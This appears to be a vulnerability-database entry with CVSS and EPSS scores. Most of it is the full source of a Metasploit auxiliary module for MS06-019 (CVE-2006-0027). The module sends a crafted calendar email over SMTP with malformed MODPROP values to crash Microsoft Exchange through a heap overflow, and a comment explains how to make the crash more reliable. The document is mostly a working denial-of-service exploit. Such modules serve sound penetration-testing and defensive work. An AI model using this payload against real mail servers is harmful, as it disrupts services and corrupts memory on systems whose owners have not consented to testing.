MS06-019 Exchange MODPROP Heap Overflow

2007-05-0113:31:11

pusscat <[email protected]>

www.rapid7.com

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.6

Confidence

Low

EPSS

0.973

Percentile

99.9%

JSON

This module triggers a heap overflow vulnerability in MS Exchange that occurs when multiple malformed MODPROP values occur in a VCAL request.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Smtp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS06-019 Exchange MODPROP Heap Overflow',
      'Description'    => %q{
        This module triggers a heap overflow vulnerability in MS
        Exchange that occurs when multiple malformed MODPROP values
        occur in a VCAL request.
      },
      'Author'         => [ 'pusscat' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'BID', '17908'],
          [ 'CVE', '2006-0027'],
          [ 'MSB', 'MS06-019'],

        ],
      'DisclosureDate' => '2004-11-12'))

    register_options(
      [
        OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains'])
      ])

  end

  #
  # This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class
  #
  def run

    connect_login

    modprops = ['attendee', 'categories', 'class', 'created', 'description',
          'dtstamp', 'duration', 'last-modified',
          'location', 'organizer', 'priority', 'recurrence-id', 'sequence',
          'status', 'summary', 'transp', 'uid']

    #modprops = ['dtstamp']

    modpropshort =	""
    modpropbusted =	""
    modnum = rand(3)

    1.upto(modnum) {
      nextprop = rand(modprops.size)
      modpropshort << modprops[nextprop] + ","
      modpropbusted << modprops[nextprop].upcase + ":\r\n"
    }

    modpropshort = "dtstamp,"
    modpropbusted = "DTSTAMP:\r\n"
    modnum = modnum + 1 + rand(3)
    modproplong	 =	modpropshort
    1.upto(modnum) {
      modproplong << modprops[rand(modprops.size)] + ","
    }

    boundary = Rex::Text.rand_text_alphanumeric(8) + "." + Rex::Text.rand_text_alphanumeric(8)


    # Really, the randomization above only crashes /sometimes/ - it's MUCH more
    # reliable, and gives crashes in better spots of you use these modprops:

    modpropshort  = "dtstamp,"
    modproplong   = "dtstamp, dtstamp,"
    modpropbusted = "DTSTAMP:\r\n"

    mail =		"From: #{datastore['MAILFROM']}\r\n"
    mail <<		"To: #{datastore['MAILTO']}\r\n"
    mail <<		"Subject: #{datastore['SUBJECT']}\r\n"
    mail <<		"Content-class: urn:content-classes:calendarmessage\r\n"
    mail <<		"MIME-Version: 1.0\r\n"
    mail <<		"Content-Type: multipart/alternative;boundary=\"#{boundary}\"\r\n"
    mail <<		"X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0\r\n"
    mail <<     "\r\n"
    mail << 	"--#{boundary}\r\n"
    mail <<		"Content-class: urn:content-classes:calendarmessage\r\n"
    mail <<		"Content-Type: text/calendar; method=REQUEST; name=\"meeting.ics\"\r\n"
    mail <<		"Content-Transfer-Encoding: 8bit\r\n"
    mail <<		"\r\n"
    mail <<		"BEGIN:VCALENDAR\r\n"
    mail <<		"BEGIN:VEVENT\r\n"
    mail <<		"X-MICROSOFT-CDO-MODPROPS:#{modpropshort.chop}\r\n"
    mail <<		modpropbusted
    mail <<		"END:VEVENT\r\n"
    mail <<		"BEGIN:VEVENT\r\n"
    mail <<		"X-MICROSOFT-CDO-MODPROPS:#{modproplong.chop}\r\n"
    mail <<		"END:VEVENT\r\n"
    mail <<		"END:VCALENDAR\r\n"
    mail <<		"\r\n--#{boundary}\r\n"
    mail <<		"\r\n.\r\n"


    print_status("Sending message...")
    sock.put(mail)
    sock.put("QUIT\r\n")
    print "<< " + (sock.get_once || '')
    disconnect
  end
end